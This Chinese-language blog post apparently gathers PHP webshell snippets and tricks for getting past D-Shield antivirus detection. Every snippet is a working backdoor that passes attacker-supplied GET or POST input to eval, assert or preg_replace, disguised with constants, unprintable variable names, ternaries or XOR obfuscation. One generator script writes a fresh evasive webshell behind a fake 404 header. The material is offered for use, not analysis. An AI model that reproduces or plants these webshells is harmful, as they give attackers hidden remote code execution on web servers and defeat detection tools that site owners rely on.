PHP Webshell Bypass
准备写一个长期更新的免杀webshell总结
2019-10-12
一个符号bypass
https://forum.90sec.com/t/topic/513/1
1<?php
2function test($name){#
3 eval($name);
4}
5
6test($_GET['code']);
7?>
2019-08-15
https://evi1.cn/post/bypass-shell/
1<?php
2$a = $_POST['cmd'];
3$var = "phpnb {${eval($a)}}";
2019-08-12
2019-08-09
疯狂免杀
2019-08-07
1<?php
2function a()
3{
4 return '' + @$_POST['a'];
5}
6
7eval(a());
再来一个三元表达式的
2019-08-06
常量过D盾
https://secquan.org/Notes/1069997
1<?php
2sprintf("123");
3sprintf("123");
4sprintf("123");
5$a=$_GET['a'];
6define("Test", "$a",true);
7assert(TesT);
8?>
另一种思路反序列化过D盾,代码自己写
再一种思路 创建对象重复定义变量成员过D盾
2019-05-30
ASCII码显示不出来的字符做变量过D盾
https://github.com/th1k404/unishell
1<?php
2if($_GET['␄']){
3 $␄=$_GET['␄'];
4 @preg_replace("/abcde/e",$␄, "abcdefg");
5}
6?>
可以自己修改
2019-05-21
https://github.com/yzddmr6/webshell-venom
利用随机异或无限免杀d盾
蚁剑插件版请移步:
https://github.com/yzddmr6/as_webshell_venom
1<?php
2//code by Mr6
3error_reporting(0);
4 function randomkeys($length)
5{
6 $pattern = '`[email protected]#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
7 for($i=0;$i<$length;$i++)
8 {
9 $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数
10 }
11 return $key;
12}
13 function randname($length)
14{
15 $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
16 for($i=0;$i<$length;$i++)
17 {
18 @$key.= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数
19 }
20 return $key;
21}
22 $str=randomkeys(6);
23 $bname=randname(4);
24 $lname=strrev(strtolower($bname));
25 $str2="assert";
26 echo "<?php \n";
27 echo "header('HTTP/1.1 404');\n";
28 echo "class ".$bname."{ public \$c='';\nfunction __destruct(){\n";
29 for ($i=0;$i<6;$i++)
30 {
31 $name="_".$i;
32 $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
33 echo "$"."$name=";
34 echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
35 }
36 $aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
37 echo $aa;
38 echo "\n";
39 echo '@$db ("$this->c");}}';
40 echo "\n";
41 echo "\${$lname}=new {$bname}();\n";
42 echo "@\${$lname}->c=\$_POST['Mr6'];\n";
43 echo "?>\n";
44 @$file=$_GET['file'];
45 $html = ob_get_contents();
46 if (isset($file)){
47 if(file_put_contents($file,$html))
48 echo "\n\n\n".$file." save success!";}
49 else {echo "Please input the file name like '?file=xxx.txt'";}
50 ?>
2019-05-11
1<?php
2function a(){
3 return $a=$_POST['1'];
4}
5@assert(a());
6?>
1<?php
2$value=$key = "a";
3foreach($_POST as $key=>$value){
4 assert($value);
5}
可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了